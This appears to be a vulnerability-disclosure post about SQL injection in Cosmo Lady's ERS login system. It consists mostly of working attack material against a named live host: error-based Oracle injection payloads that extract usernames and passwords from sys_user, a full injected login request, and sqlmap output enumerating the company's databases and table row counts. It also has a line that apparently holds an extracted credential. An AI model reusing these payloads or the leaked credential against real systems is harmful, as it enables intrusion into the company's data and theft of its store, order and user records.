都市丽人ERS系统SQL注射（涉及7库/涉及大量门店信息/涉及几十万订单信息）

loginWay=0&usercode=' and length(PASSWORD)=32 and 1=ctxsys.drithsx.sn(1,(select usercode from sys_user where rownum=1)) and 'a'='a&passwd=1

loginWay=0&usercode=' and length(PASSWORD)=32 and 1=ctxsys.drithsx.sn(1,(select password from sys_user where rownum=1)) and 'a'='a&passwd=1

giis dslrers

POST /ers/logonNewAction.do?method=logon HTTP/1.1
 Host: ers.cosmo-lady.com
 Content-Length: 26
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://ers.cosmo-lady.com
 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
 Content-Type: application/x-www-form-urlencoded
 Referer: http://ers.cosmo-lady.com/ers/logonNewAction.do?method=logon
 Accept-Encoding: gzip,deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: JSESSIONID=0000-LWAganFp8eufZNbmbri5hC:1843f7u7f
 
 usercode=aaa%27&passwd=aaa

available databases [12]:
 [*] APEX_030200
 [*] CTXSYS
 [*] ERS
 [*] EXFSYS
 [*] LPS
 [*] MDSYS
 [*] MPS
 [*] OLAPSYS
 [*] SAPFEP
 [*] SYS
 [*] SYSTEM
 [*] XDB
 
 [16:36:31] [INFO] fetched data logged to text files under 'C:/Users/k/.sqlmap/output/ers.cosmo-lady.com'

Database: ERS
 +-------------------------------+---------+
 | Table                         | Entries |
 +-------------------------------+---------+
 | INF_LOG                       | 178984  |
 | SYS_LOGONLOG                  | 83910   |
 | SYS_SQLLOG                    | 68074   |
 | SMS_SEND                      | 59321   |
 | WF_HISTINSTTASK_BAK           | 30953   |
 | SYS_USER_GROUP                | 12058   |
 | SYS_USER                      | 12027   |
 | CHA_SHOP_T                    | 11611   |
 | BILL_MAIN_BAK_T               | 6287    |
 | SHOP_REPAIR_BILL_DETAIL_BAK_T | 6287    |
 | WF_HISTINST                   | 6177    |
 | CRM_PROVINCE_CITY_TOWN_T      | 3402    |
 | CHA_CLIENT_T                  | 2633    |
 | BILL_ATTACHMENT_T             | 1585    |
 | WF_HISTINSTTASK               | 1571    |
 | SHOP_REPAIR_BILL_DETAIL_T     | 1082    |
 | BILL_MAIN_T                   | 1079    |
 | SYS_OPERATELOG                | 1012    |
 | BILL_PERSON_T                 | 800     |
 | WF_INST                       | 800     |
 | WF_INSTCURTASK                | 800     |
 | WF_INSTVAR                    | 749     |
 | CRM_REGION_T                  | 513     |
 | CRM_REGION_PERSON_REL_T       | 504     |
 | SYS_CODELIST_T                | 232     |
 | EXTEND_PERSON_REL_T           | 131     |
 | SYS_GROUP_PRIVILEGE           | 128     |
 | SMS_INFO                      | 74      |
 | CL_BUS_BASE_T                 | 68      |
 | TEMP_T                        | 39      |
 | SYS_PRIVILEGE                 | 33      |
 | SYS_USER_HIS                  | 28      |
 | DEVICE_TYPE_T                 | 25      |
 | SYS_GROUP                     | 21      |
 | SYS_LEADER_DEPT_T             | 20      |
 | WF_NODEREL                    | 12      |
 | WF_NODE                       | 10      |
 | SYS_ORGANZATION               | 7       |
 | BUILD_MANAGER_T               | 5       |
 | SYS_ROLE_NODE_T               | 5       |
 | SYS_USER_EXT_T                | 4       |
 | WF_ACTION                     | 3       |
 | SYS_MAIL_SERVER_T             | 1       |
 | SYS_RESOURCE                  | 1       |
 | SYS_SUBSYS                    | 1       |
 | WF_AREACLASSTEMPREL           | 1       |
 | WF_TEMPLET                    | 1       |
 +-------------------------------+---------+